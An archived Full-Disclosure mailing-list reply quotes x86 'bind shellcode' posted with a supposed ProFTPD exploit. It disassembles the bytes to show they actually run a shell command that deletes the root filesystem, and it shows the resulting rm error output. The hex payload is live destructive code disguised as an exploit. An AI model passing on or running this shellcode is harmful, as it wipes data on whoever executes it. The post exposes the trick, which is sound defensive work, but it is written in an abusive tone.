lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200310260546.h9Q5kwBJ066262@mailserver1.hushmail.com>
From: ebh at hushmail.com (ebh@...hmail.com)
Subject: Re: ProFTPD-1.2.9rc2 localhost delete

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dilema posted the *same* message twice to FD, just because he is a fame
whore.

- --=-QFP9PbcI+zCcGGGTK/wB
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Yeah umm thats some sexy shellcode there.

>=20
> /* x86 bind shellcode */
> char sc[]=3D
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

00000002  50                push eax
00000003  6866202F58        push dword 0x582f2066
00000008  686D202D72        push dword 0x722d206d
0000000D  682D635872        push dword 0x7258632d
00000012  6841414141        push dword 0x41414141
00000017  6841414141        push dword 0x41414141
0000001C  6841414141        push dword 0x41414141
00000021  6841414141        push dword 0x41414141
00000026  682F736843        push dword 0x4368732f
0000002B  682F62696E        push dword 0x6e69622f
00000030  31C0              xor eax,eax
00000032  88442407          mov [esp+0x7],al
00000036  8844241A          mov [esp+0x1a],al
0000003A  88442423          mov [esp+0x23],al
0000003E  89642408          mov [esp+0x8],esp
00000042  31DB              xor ebx,ebx
00000044  8D5C2418          lea ebx,[esp+0x18]
00000048  895C240C          mov [esp+0xc],ebx
0000004C  31DB              xor ebx,ebx
0000004E  8D5C241B          lea ebx,[esp+0x1b]
00000052  895C2410          mov [esp+0x10],ebx
00000056  89442414          mov [esp+0x14],eax
0000005A  31DB              xor ebx,ebx
0000005C  89E3              mov ebx,esp
0000005E  8D4C2408          lea ecx,[esp+0x8]
00000062  31D2              xor edx,edx
00000064  8D542414          lea edx,[esp+0x14]
00000068  B00B              mov al,0xb
0000006A  CD80              int 0x80
0000006C  31DB              xor ebx,ebx
0000006E  31C0              xor eax,eax
00000071  CD80              int 0x80

## Super Seczy Shellcode ##

rm: cannot remove `//bin': Permission denied =20
rm: cannot remove `//dev': Permission denied =20
rm: cannot remove `//etc': Permission denied
rm: cannot remove `//lib': Permission denied
rm: cannot remove `//mnt': Permission denied=20
rm: cannot remove `//opt': Permission denied
rm: cannot remove `//tmp': Permission denied =20
rm: cannot remove `//sys': Permission denied
rm: cannot remove `//var': Permission denied
rm: cannot remove `//usr': Permission denied
rm: cannot remove `//boot': Permission denied
rm: cannot remove `//home': Permission denied
rm: cannot remove `//proc': Permission denied
rm: cannot remove `//sbin': Permission denied
rm: cannot remove `//root': Permission denied
rm: cannot remove `//share': Permission denied
rm: cannot remove `//.bash_history': Permission denied
rm: cannot remove `//.xauthKbxfnN': Permission denied
rm: cannot remove `//.irssi': Permission denied
- --=20
dilema <dilema@...rs.net>

- --=-QFP9PbcI+zCcGGGTK/wB
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iQEVAwUAP5lXx/J/0j5bC9FtAQIudwgAlPlb6YU52Yi3YQe7UAHvzhwNascAbkUk
QjBHQOmrl7mR9jHYx1DfTqDgvJ5C2TfFM2NXNtdm3A7Q8SEzcLb/FdnC9nJWbybk
aDKHwfY6i5Js9F9pdD3pANW7jQ7vpOJc5D9hlL6uaOVyoj39u5KtfqhdW3x22O2l
kHQneM3/FTC8If/c8gcH3wz/DRY9t+wlWddAsafICV0B5N2UwD+d1ipVU3k1PVXE
6KaQuXM1Jx74phlMzjhLpmABvAEC2jZwomk/oy8d7MF/7Hb1SUBC4afzTozB/uSf
0Kcpw69dXvdcVtEyBczMVY7BtfpN3TGyERbQq6kvJ3Z6KnpNadtxlg==
=DCtX
- -----END PGP SIGNATURE-----

- --=-QFP9PbcI+zCcGGGTK/wB--
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAj+bX70ACgkQ+Po7xVA6AFet0gCgq4LLpp5Q/TWrq5eENmFixc+0R24A
n0tpvddf/bg4/ai9qZnncdJJ3aNL
=yOt4
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ